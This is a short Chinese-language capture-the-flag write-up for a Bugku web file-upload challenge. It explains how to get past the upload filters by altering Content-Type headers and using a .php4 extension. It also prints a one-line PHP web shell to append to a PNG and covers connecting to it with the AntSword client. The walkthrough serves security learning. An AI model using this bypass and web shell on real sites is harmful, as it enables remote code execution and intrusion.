bugkuctf-web-文件上传(kali操作)
一、题目描述:
二、启动场景
My name is margin,give me a image file not a php
可以上传图片但不可以上传php文件,说明存在三个过滤:
- 请求头部的 Content-Type
- 文件后缀
- 请求数据的Content-Type
三、解题流程
1、上传文件就想到可以用burpsuite抓包修改数据,先在本地找个截图上传(建议截图小一点,一小块就行),点击submit的时候开始抓包,并右键选择send to repeat送到repeat模块
2.修改请求头
请求头部的 Content-Type 内容 随便改个大写字母过滤掉 比如 mulTipart/form-data
所上传的文件后缀 改为 .php4
请求数据的Content-Type 内容改为 image /jpeg
在PNG文件末尾添加一句木马:<?php eval($_POST['cmd']); ?>
3.重新发送请求后的数据
数据修改好后点击send发送,会显示4.打开蚁剑进行连接
右键点击添加数据,注意URL地址不要有额外的参数(只有IP地址和bp返回的链接),密码是木马里面的参数,这里是cmd。最后最后最后,一定记得点添加!!!
5.找flag
双击进入,回到根目录,找到flag,双击打开即可获得四、声明
这篇文章是我首次所创,格式不太美观请将就一下,主要是因为我看其他人的答题心得对新手来说(别问我咋看出来的,我就是新手)不太容易理解和操作,所以就结合一些他们的心得进行创作。